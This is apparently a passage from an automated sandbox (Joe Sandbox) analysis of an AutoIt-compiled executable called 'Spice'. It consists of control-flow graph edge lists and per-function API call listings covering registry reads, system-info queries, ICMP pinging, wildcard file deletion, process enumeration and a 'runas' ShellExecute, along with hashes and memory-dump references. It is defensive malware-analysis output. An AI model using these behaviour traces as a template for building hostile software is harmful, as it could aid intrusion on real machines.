Mailbox 100562->100609 100568 e84e49 KillTimer 100563->100568 100569 ec0965 100563->100569 100570 e84e8e CreatePopupMenu 100564->100570 100564->100588 100571 e84df8 100565->100571 100572 e84eb7 100565->100572 100612 ed2cce 97 API calls _memset 100566->100612 100577 e85ac3 Shell_NotifyIconW 100568->100577 100575 ec099e MoveWindow 100569->100575 100576 ec096a 100569->100576 100570->100588 100578 ec0a1a 100571->100578 100579 e84e03 100571->100579 100599 e85b29 100572->100599 100574 ec09e9 100610 e7c483 277 API calls Mailbox 100574->100610 100575->100588 100582 ec098d SetFocus 100576->100582 100583 ec096e 100576->100583 100584 e84e5c 100577->100584 100578->100560 100611 ec8854 59 API calls Mailbox 100578->100611 100585 e84e9b 100579->100585 100586 e84e0e 100579->100586 100582->100588 100583->100586 100589 ec0977 100583->100589 100606 e734e4 DeleteObject DestroyWindow Mailbox 100584->100606 100607 e85bd7 107 API calls _memset 100585->100607 100586->100560 100596 e85ac3 Shell_NotifyIconW 100586->100596 100587 ec0a47 100587->100560 100587->100588 100608 e7c460 10 API calls Mailbox 100589->100608 100594->100560 100595 e84eab 100595->100588 100597 ec0a0e 100596->100597 100598 e859d3 94 API calls 100597->100598 100598->100594 100600 e85b40 _memset 100599->100600 100601 e85bc2 100599->100601 100602 e856f8 87 API calls 100600->100602 100601->100588 100604 e85b67 100602->100604 100603 e85bab KillTimer SetTimer 100603->100601 100604->100603 100605 ec0d6e Shell_NotifyIconW 100604->100605 100605->100603 100606->100588 100607->100595 100608->100588 100609->100574 100610->100586 100611->100594 100612->100587 100613 e79b8b 100616 e786e0 100613->100616 100617 e786fd 100616->100617 100618 eb0ff8 100617->100618 100619 eb0fad 100617->100619 100643 e78724 100617->100643 100656 eeaad0 277 API calls __cinit 100618->100656 100622 eb0fb5 100619->100622 100626 eb0fc2 100619->100626 100619->100643 100654 eeb0e4 277 API calls 100622->100654 100623 e92f70 __cinit 67 API calls 100623->100643 100640 e7898d 100626->100640 100655 eeb58c 277 API calls 3 library calls 100626->100655 100627 eb1289 100627->100627 100629 eb11af 100658 eeae3b 89 API calls 100629->100658 100632 e78a17 100633 e739be 68 API calls 100633->100643 100636 e7523c 59 API calls 100636->100643 100638 e73f42 68 API calls 100638->100643 100639 e73c30 68 API calls 100639->100643 100640->100632 100659 eda48d 89 API calls 4 library calls 100640->100659 100641 e753b0 277 API calls 100641->100643 100642 e81c9c 59 API calls 100642->100643 100643->100623 100643->100629 100643->100632 100643->100633 100643->100636 100643->100638 100643->100639 100643->100640 100643->100641 100643->100642 100645 e73938 68 API calls 100643->100645 100646 e7855e 277 API calls 100643->100646 100647 e75278 100643->100647 100652 e784e2 89 API calls 100643->100652 100653 e7835f 277 API calls 100643->100653 100657 ec73ab 59 API calls 100643->100657 100645->100643 100646->100643 100648 e90fe6 Mailbox 59 API calls 100647->100648 100649 e75285 100648->100649 100650 e75294 100649->100650 100651 e81a36 59 API calls 100649->100651 100650->100643 100651->100650 100652->100643 100653->100643 100654->100626 100655->100640 100656->100643 100657->100643 100658->100640 100659->100627 100660 e79a88 100661 e786e0 277 API calls 100660->100661 100662 e79a96 100661->100662 100663 eb48fb 100664 e7b020 277 API calls 100663->100664 100665 eb4912 100664->100665 100667 e7cce0 100665->100667 100668 eda48d 89 API calls 4 library calls 100665->100668 100667->100667 100668->100667 100669 eadc5a 100670 e90fe6 Mailbox 59 API calls 100669->100670 100671 eadc61 100670->100671 100672 eadc7a _memmove 100671->100672 100674 e90fe6 Mailbox 59 API calls 100671->100674 100673 e90fe6 Mailbox 59 API calls 100672->100673 100675 eadc9f 100673->100675 100674->100672 100676 e77357 100677 e778f5 100676->100677 100678 e77360 100676->100678 100685 e76fdb Mailbox 100677->100685 100693 ec87f9 59 API calls _memmove 100677->100693 100678->100677 100679 e74d37 84 API calls 100678->100679 100680 e7738b 100679->100680 100680->100677 100682 e7739b 100680->100682 100687 e81680 100682->100687 100684 eaf91b 100686 e81c9c 59 API calls 100684->100686 100686->100685 100688 e816ba _memmove 100687->100688 100689 e81692 100687->100689 100688->100685 100689->100688 100690 e90fe6 Mailbox 59 API calls 100689->100690 100692 e8176f _memmove 100690->100692 100691 e90fe6 Mailbox 59 API calls 100691->100692 100692->100691 100693->100684 100694 e71016 100699 e85ce7 100694->100699 100697 e92f70 __cinit 67 API calls 100698 e71025 100697->100698 100700 e90fe6 Mailbox 59 API calls 100699->100700 100701 e85cef 100700->100701 100702 e7101b 100701->100702 100706 e85f39 100701->100706 100702->100697 100707 e85f42 100706->100707 100708 e85cfb 100706->100708 100709 e92f70 __cinit 67 API calls 100707->100709 100710 e85d13 100708->100710 100709->100708 100711 e81207 59 API calls 100710->100711 100712 e85d2b GetVersionExW 100711->100712 100713 e81821 59 API calls 100712->100713 100714 e85d6e 100713->100714 100715 e81981 59 API calls 100714->100715 100718 e85d9b 100714->100718 100716 e85d8f 100715->100716 100717 e8133d 59 API calls 100716->100717 100717->100718 100719 e85e00 GetCurrentProcess IsWow64Process 100718->100719 100723 ec1098 100718->100723 100720 e85e19 100719->100720 100721 e85e98 GetSystemInfo 100720->100721 100722 e85e2f 100720->100722 100725 e85e65 100721->100725 100734 e855f0 100722->100734 100725->100702 100727 e85e8c GetSystemInfo 100730 e85e56 100727->100730 100728 e85e41 100729 e855f0 2 API calls 100728->100729 100731 e85e49 GetNativeSystemInfo 100729->100731 100730->100725 100732 e85e5c FreeLibrary 100730->100732 100731->100730 100732->100725 100735 e85619 100734->100735 100736 e855f9 LoadLibraryA 100734->100736 100735->100727 100735->100728 100736->100735 100737 e8560a GetProcAddress 100736->100737 100737->100735 100738 e71055 100743 e72a19 100738->100743 100741 e92f70 __cinit 67 API calls 100742 e71064 100741->100742 100744 e81207 59 API calls 100743->100744 100745 e72a87 100744->100745 100750 e71256 100745->100750 100748 e72b24 100749 e7105a 100748->100749 100753 e713f8 59 API calls 2 library calls 100748->100753 100749->100741 100754 e71284 100750->100754 100753->100748 100755 e71275 100754->100755 100756 e71291 100754->100756 100755->100748 100756->100755 100757 e71298 RegOpenKeyExW 100756->100757 100757->100755 100758 e712b2 RegQueryValueExW 100757->100758 100759 e712d3 100758->100759 100760 e712e8 RegCloseKey 100758->100760 100759->100760 100760->100755 100761 e75ff5 100784 e75ede Mailbox _memmove 100761->100784 100762 e90fe6 59 API calls Mailbox 100762->100784 100763 e76a9b 100893 e7a9de 277 API calls 100763->100893 100764 e753b0 277 API calls 100764->100784 100766 eaeff9 100905 e75190 59 API calls Mailbox 100766->100905 100768 eaf007 100906 eda48d 89 API calls 4 library calls 100768->100906 100770 eaefeb 100817 e75569 Mailbox 100770->100817 100904 ec6cf1 59 API calls Mailbox 100770->100904 100773 e760e5 100774 eae137 100773->100774 100781 e763bd Mailbox 100773->100781 100786 e76152 Mailbox 100773->100786 100788 e76abc 100773->100788 100774->100781 100894 ec7aad 59 API calls 100774->100894 100775 e81c9c 59 API calls 100775->100784 100777 e7523c 59 API calls 100777->100784 100779 e90fe6 Mailbox 59 API calls 100783 e763d1 100779->100783 100780 e81a36 59 API calls 100780->100784 100781->100779 100793 e76426 100781->100793 100782 eec355 277 API calls 100782->100784 100785 e763de 100783->100785 100783->100788 100784->100762 100784->100763 100784->100764 100784->100766 100784->100768 100784->100773 100784->100775 100784->100777 100784->100780 100784->100782 100784->100788 100784->100817 100897 ed7f11 59 API calls Mailbox 100784->100897 100898 ec6cf1 59 API calls Mailbox 100784->100898 100789 e76413 100785->100789 100790 eae172 100785->100790 100786->100770 100786->100788 100809 eae2e9 VariantClear 100786->100809 100786->100817 100824 eee60c 130 API calls 100786->100824 100829 e7cfd7 100786->100829 100848 ee3105 100786->100848 100853 ee5e1d 100786->100853 100878 eeec68 100786->100878 100886 eeebba 100786->100886 100892 e75190 59 API calls Mailbox 100786->100892 100899 ec7aad 59 API calls 100786->100899 100903 eda48d 89 API calls 4 library calls 100788->100903 100789->100793 100819 e75447 Mailbox 100789->100819 100895 eec87c 85 API calls 2 library calls 100790->100895 100896 eec9c9 95 API calls Mailbox 100793->100896 100795 eae19d 100795->100795 100796 e90fe6 59 API calls Mailbox 100796->100819 100798 eae691 100900 eda48d 89 API calls 4 library calls 100798->100900 100799 eaf165 100908 eda48d 89 API calls 4 library calls 100799->100908 100802 e76e30 60 API calls 100802->100819 100803 e769fa 100808 e81c9c 59 API calls 100803->100808 100804 e81c9c 59 API calls 100804->100819 100805 eae6a0 100806 e769ff 100806->100798 100806->100799 100808->100817 100809->100786 100810 eaea9a 100812 e81c9c 59 API calls 100810->100812 100811 e77e50 277 API calls 100811->100819 100812->100817 100813 e81207 59 API calls 100813->100819 100814 ec7aad 59 API calls 100814->100819 100815 e92f70 67 API calls __cinit 100815->100819 100816 eaeb67 100816->100817 100901 ec7aad 59 API calls 100816->100901 100819->100796 100819->100798 100819->100802 100819->100803 100819->100804 100819->100806 100819->100810 100819->100811 100819->100813 100819->100814 100819->100815 100819->100816 100819->100817 100820 eaef28 100819->100820 100822 e75a1a 100819->100822 100902 eda48d 89 API calls 4 library calls 100820->100902 100907 eda48d 89 API calls 4 library calls 100822->100907 100824->100786 100830 e74d37 84 API calls 100829->100830 100831 e7d001 100830->100831 100832 e75278 59 API calls 100831->100832 100833 e7d018 100832->100833 100834 e7d57b 100833->100834 100843 e7d439 Mailbox __NMSG_WRITE 100833->100843 100909 e7502b 59 API calls 100833->100909 100834->100786 100836 e9312d _W_store_winword 60 API calls 100836->100843 100837 e90c65 62 API calls 100837->100843 100838 e8162d 59 API calls 100838->100843 100839 e74f98 59 API calls 100839->100843 100842 e74d37 84 API calls 100842->100843 100843->100834 100843->100836 100843->100837 100843->100838 100843->100839 100843->100842 100844 e7502b 59 API calls 100843->100844 100845 e81821 59 API calls 100843->100845 100846 e859d3 94 API calls 100843->100846 100847 e85ac3 Shell_NotifyIconW 100843->100847 100910 e8153b 59 API calls 2 library calls 100843->100910 100911 e74f3c 59 API calls Mailbox 100843->100911 100844->100843 100845->100843 100846->100843 100847->100843 100849 e7523c 59 API calls 100848->100849 100850 ee3118 100849->100850 100912 ed7d6e 100850->100912 100852 ee3120 100852->100786 100854 ee5e46 100853->100854 100855 ee5e74 WSAStartup 100854->100855 100949 e7502b 59 API calls 100854->100949 100857 ee5e9d 100855->100857 100867 ee5e88 Mailbox 100855->100867 100944 e840cd 100857->100944 100858 ee5e61 100858->100855 100950 e7502b 59 API calls 100858->100950 100861 e74d37 84 API calls 100863 ee5eb2 100861->100863 100865 e8402a 61 API calls 100863->100865 100864 ee5e70 100864->100855 100866 ee5ebf inet_addr gethostbyname 100865->100866 100866->100867 100868 ee5edd IcmpCreateFile 100866->100868 100867->100786 100868->100867 100869 ee5f01 100868->100869 100870 e90fe6 Mailbox 59 API calls 100869->100870 100871 ee5f1a 100870->100871 100872 e8433f 59 API calls 100871->100872 100873 ee5f25 100872->100873 100874 ee5f34 IcmpSendEcho 100873->100874 100875 ee5f55 IcmpSendEcho 100873->100875 100877 ee5f6d 100874->100877 100875->100877 100876 ee5fd4 IcmpCloseHandle WSACleanup 100876->100867 100877->100876 100879 eeecab 100878->100879 100885 eeec84 100878->100885 100883 eeeccd 100879->100883 100954 e7502b 59 API calls 100879->100954 100882 eeed11 100951 ed67fc 100882->100951 100883->100882 100883->100885 100955 e7502b 59 API calls 100883->100955 100885->100786 100887 eeebcd 100886->100887 100888 e74d37 84 API calls 100887->100888 100890 eeebdc 100887->100890 100889 eeec0a 100888->100889 100956 ed7ce4 100889->100956 100890->100786 100892->100786 100893->100788 100894->100781 100895->100793 100896->100795 100897->100784 100898->100784 100899->100786 100900->100805 100901->100817 100902->100822 100903->100770 100904->100817 100905->100770 100906->100770 100907->100817 100908->100817 100909->100843 100910->100843 100911->100843 100913 ed7ea5 100912->100913 100914 ed7d85 100912->100914 100913->100852 100915 ed7d9d 100914->100915 100917 ed7dc5 100914->100917 100919 ed7ddc 100914->100919 100915->100917 100921 ed7dad 100915->100921 100916 e90fe6 Mailbox 59 API calls 100932 ed7dbb Mailbox _memmove 100916->100932 100917->100916 100918 ed7df9 100922 ed7e24 100918->100922 100923 ed7e32 100918->100923 100918->100932 100919->100918 100920 e90fe6 Mailbox 59 API calls 100919->100920 100920->100918 100927 e90fe6 Mailbox 59 API calls 100921->100927 100924 e90fe6 Mailbox 59 API calls 100922->100924 100925 e90fe6 Mailbox 59 API calls 100923->100925 100924->100932 100928 ed7e38 100925->100928 100926 e90fe6 Mailbox 59 API calls 100926->100913 100927->100932 100933 ed7a26 59 API calls Mailbox 100928->100933 100930 ed7e44 100934 e8402a WideCharToMultiByte 100930->100934 100932->100926 100933->100930 100935 e8404e 100934->100935 100936 e84085 100934->100936 100938 e90fe6 Mailbox 59 API calls 100935->100938 100943 e83f20 59 API calls Mailbox 100936->100943 100939 e84055 WideCharToMultiByte 100938->100939 100942 e83f79 59 API calls 2 library calls 100939->100942 100941 e84077 100941->100932 100942->100941 100943->100941 100945 e90fe6 Mailbox 59 API calls 100944->100945 100946 e840e0 100945->100946 100947 e81c7e 59 API calls 100946->100947 100948 e840ed 100947->100948 100948->100861 100949->100858 100950->100864 100952 ed6818 92 API calls 100951->100952 100953 ed6813 100952->100953 100953->100885 100954->100883 100955->100882 100957 ed7cf1 100956->100957 100958 e90fe6 Mailbox 59 API calls 100957->100958 100959 ed7cf8 100958->100959 100962 ed6135 100959->100962 100961 ed7d3b Mailbox 100961->100890 100963 e81aa4 59 API calls 100962->100963 100964 ed6148 CharLowerBuffW 100963->100964 100965 ed615b 100964->100965 100966 ed6195 100965->100966 100967 e81609 59 API calls 100965->100967 100979 ed6165 _memset Mailbox 100965->100979 100968 ed61a7 100966->100968 100969 e81609 59 API calls 100966->100969 100967->100965 100970 e90fe6 Mailbox 59 API calls 100968->100970 100969->100968 100973 ed61d5 100970->100973 100975 ed61f4 100973->100975 100995 ed6071 59 API calls 100973->100995 100974 ed6233 100976 e90fe6 Mailbox 59 API calls 100974->100976 100974->100979 100980 ed6292 100975->100980 100977 ed624d 100976->100977 100978 e90fe6 Mailbox 59 API calls 100977->100978 100978->100979 100979->100961 100981 e81207 59 API calls 100980->100981 100982 ed62c4 100981->100982 100983 e81207 59 API calls 100982->100983 100984 ed62cd 100983->100984 100985 e81207 59 API calls 100984->100985 100991 ed62d6 _wcscmp 100985->100991 100986 e81821 59 API calls 100986->100991 100987 e93836 GetStringTypeW 100987->100991 100988 e8153b 59 API calls 100988->100991 100990 e937ba 59 API calls 100990->100991 100991->100986 100991->100987 100991->100988 100991->100990 100992 ed6292 60 API calls 100991->100992 100993 ed65ab Mailbox 100991->100993 100994 e81c9c 59 API calls 100991->100994 100996 e9385c GetStringTypeW _iswctype 100991->100996 100992->100991 100993->100974 100994->100991 100995->100973 100996->100991 100997 e7107d 101002 e82fc5 100997->101002 100999 e7108c 101000 e92f70 __cinit 67 API calls 100999->101000 101001 e71096 101000->101001 101003 e82fd5 __ftell_nolock 101002->101003 101004 e81207 59 API calls 101003->101004 101005 e8308b 101004->101005 101006 e900cf 61 API calls 101005->101006 101007 e83094 101006->101007 101033 e908c1 101007->101033 101010 e81900 59 API calls 101011 e830ad 101010->101011 101012 e84c94 59 API calls 101011->101012 101013 e830bc 101012->101013 101014 e81207 59 API calls 101013->101014 101015 e830c5 101014->101015 101016 e819e1 59 API calls 101015->101016 101017 e830ce RegOpenKeyExW 101016->101017 101018 ec01a3 RegQueryValueExW 101017->101018 101022 e830f0 Mailbox 101017->101022 101019 ec0235 RegCloseKey 101018->101019 101020 ec01c0 101018->101020 101019->101022 101032 ec0247 _wcscat Mailbox __NMSG_WRITE 101019->101032 101021 e90fe6 Mailbox 59 API calls 101020->101021 101023 ec01d9 101021->101023 101022->100999 101025 e8433f 59 API calls 101023->101025 101024 e81609 59 API calls 101024->101032 101026 ec01e4 RegQueryValueExW 101025->101026 101027 ec0201 101026->101027 101029 ec021b 101026->101029 101028 e81821 59 API calls 101027->101028 101028->101029 101029->101019 101030 e81a36 59 API calls 101030->101032 101031 e84c94 59 API calls 101031->101032 101032->101022 101032->101024 101032->101030 101032->101031 101034 ea1b70 __ftell_nolock 101033->101034 101035 e908ce GetFullPathNameW 101034->101035 101036 e908f0 101035->101036 101037 e81821 59 API calls 101036->101037 101038 e8309f 101037->101038 101038->101010

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E8526C
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 00E8527E
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E852E6
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                        • Part of subcall function 00E7BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E7BC07
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00E85366
                                                                                                                                                                                                                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00EC0B2E
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC0B66
                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F26D10), ref: 00EC0BE9
                                                                                                                                                                                                                                      • ShellExecuteW.SHELL32(00000000), ref: 00EC0BF0
                                                                                                                                                                                                                                        • Part of subcall function 00E8514C: GetSysColorBrush.USER32(0000000F), ref: 00E85156
                                                                                                                                                                                                                                        • Part of subcall function 00E8514C: LoadCursorW.USER32(00000000,00007F00), ref: 00E85165
                                                                                                                                                                                                                                        • Part of subcall function 00E8514C: LoadIconW.USER32(00000063), ref: 00E8517C
                                                                                                                                                                                                                                        • Part of subcall function 00E8514C: LoadIconW.USER32(000000A4), ref: 00E8518E
                                                                                                                                                                                                                                        • Part of subcall function 00E8514C: LoadIconW.USER32(000000A2), ref: 00E851A0
                                                                                                                                                                                                                                        • Part of subcall function 00E8514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E851C6
                                                                                                                                                                                                                                        • Part of subcall function 00E8514C: RegisterClassExW.USER32(?), ref: 00E8521C
                                                                                                                                                                                                                                        • Part of subcall function 00E850DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E85109
                                                                                                                                                                                                                                        • Part of subcall function 00E850DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E8512A
                                                                                                                                                                                                                                        • Part of subcall function 00E850DB: ShowWindow.USER32(00000000), ref: 00E8513E
                                                                                                                                                                                                                                        • Part of subcall function 00E850DB: ShowWindow.USER32(00000000), ref: 00E85147
                                                                                                                                                                                                                                        • Part of subcall function 00E859D3: _memset.LIBCMT ref: 00E859F9
                                                                                                                                                                                                                                        • Part of subcall function 00E859D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E85A9E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • runas, xrefs: 00EC0BE4
                                                                                                                                                                                                                                      • AutoIt, xrefs: 00EC0B23
                                                                                                                                                                                                                                      • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00EC0B28
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                                                                                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                      • API String ID: 529118366-2030392706
                                                                                                                                                                                                                                      • Opcode ID: 84f172548eae7d420b50ab3e6fe537f7697114c96592a238d73555be9f99a4b8
                                                                                                                                                                                                                                      • Instruction ID: d5e85586c533b29a718cd606ec71b2fa7efea8ad2b4856c185a0649fe8ff5130
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84f172548eae7d420b50ab3e6fe537f7697114c96592a238d73555be9f99a4b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C851177190834CEACB21FBB0DC05EFE7BB9AB05754F1060A9F45DB2162CE759906EB21
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 871 e85d13-e85d73 call e81207 GetVersionExW call e81821 876 e85e78-e85e7a 871->876 877 e85d79 871->877 879 ec0fa9-ec0fb5 876->879 878 e85d7c-e85d81 877->878 881 e85e7f-e85e80 878->881 882 e85d87 878->882 880 ec0fb6-ec0fba 879->880 883 ec0fbc 880->883 884 ec0fbd-ec0fc9 880->884 885 e85d88-e85dbf call e81981 call e8133d 881->885 882->885 883->884 884->880 886 ec0fcb-ec0fd0 884->886 894 ec1098-ec109b 885->894 895 e85dc5-e85dc6 885->895 886->878 888 ec0fd6-ec0fdd 886->888 888->879 890 ec0fdf 888->890 893 ec0fe4-ec0fea 890->893 896 e85e00-e85e17 GetCurrentProcess IsWow64Process 893->896 897 ec109d 894->897 898 ec10b4-ec10b8 894->898 899 ec0fef-ec0ffa 895->899 900 e85dcc-e85dcf 895->900 905 e85e19 896->905 906 e85e1c-e85e2d 896->906 903 ec10a0 897->903 907 ec10ba-ec10c3 898->907 908 ec10a3-ec10ac 898->908 901 ec0ffc-ec1002 899->901 902 ec1017-ec1019 899->902 900->896 904 e85dd1-e85def 900->904 911 ec100c-ec1012 901->911 912 ec1004-ec1007 901->912 914 ec103c-ec103f 902->914 915 ec101b-ec1027 902->915 903->908 904->896 913 e85df1-e85df7 904->913 905->906 909 e85e98-e85ea2 GetSystemInfo 906->909 910 e85e2f-e85e3f call e855f0 906->910 907->903 916 ec10c5-ec10c8 907->916 908->898 923 e85e65-e85e75 909->923 928 e85e8c-e85e96 GetSystemInfo 910->928 929 e85e41-e85e4e call e855f0 910->929 911->896 912->896 913->893 920 e85dfd 913->920 918 ec1065-ec1068 914->918 919 ec1041-ec1050 914->919 921 ec1029-ec102c 915->921 922 ec1031-ec1037 915->922 916->908 918->896 927 ec106e-ec1083 918->927 925 ec105a-ec1060 919->925 926 ec1052-ec1055 919->926 920->896 921->896 922->896 925->896 926->896 930 ec108d-ec1093 927->930 931 ec1085-ec1088 927->931 933 e85e56-e85e5a 928->933 936 e85e50-e85e54 GetNativeSystemInfo 929->936 937 e85e85-e85e8a 929->937 930->896 931->896 933->923 935 e85e5c-e85e5f FreeLibrary 933->935 935->923 936->933 937->936
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 00E85D40
                                                                                                                                                                                                                                        • Part of subcall function 00E81821: _memmove.LIBCMT ref: 00E8185B
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,00F00A18,00000000,00000000,?), ref: 00E85E07
                                                                                                                                                                                                                                      • IsWow64Process.KERNEL32(00000000), ref: 00E85E0E
                                                                                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00E85E54
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00E85E5F
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00E85E90
                                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00E85E9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1986165174-0
                                                                                                                                                                                                                                      • Opcode ID: b0450facc7effc1ccfc30c9675933f76444ac12b47750d15f945510652b6e5e6
                                                                                                                                                                                                                                      • Instruction ID: 04bfd96f7002703c18247762c97e43146d3ba963542298759436638cec5e81c9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0450facc7effc1ccfc30c9675933f76444ac12b47750d15f945510652b6e5e6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4912532549BC0DEC731DB7885515ABBFE57F2A300F881A9ED0CFA3A02D631A548D759
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E90284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E82A58,?,00008000), ref: 00E902A4
                                                                                                                                                                                                                                        • Part of subcall function 00ED4FEC: GetFileAttributesW.KERNEL32(?,00ED3BFE), ref: 00ED4FED
                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00ED407C
                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00ED40CC
                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ED40DD
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ED40F4
                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00ED40FD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                      • Opcode ID: 797f17c77ebcddf6ba0f228990afc06e47848f4559e4246ae4f3b414f7b121d2
                                                                                                                                                                                                                                      • Instruction ID: 142f88a87c152baeaadd8bf37452f6c4495fe86d79d544115f00417ea2e4df0c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 797f17c77ebcddf6ba0f228990afc06e47848f4559e4246ae4f3b414f7b121d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F43183710083459BC705FB60D8959AFB7ECBEA5304F441A5EF4D9A22D2DB30D90ADB53
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00ED416D
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00ED417B
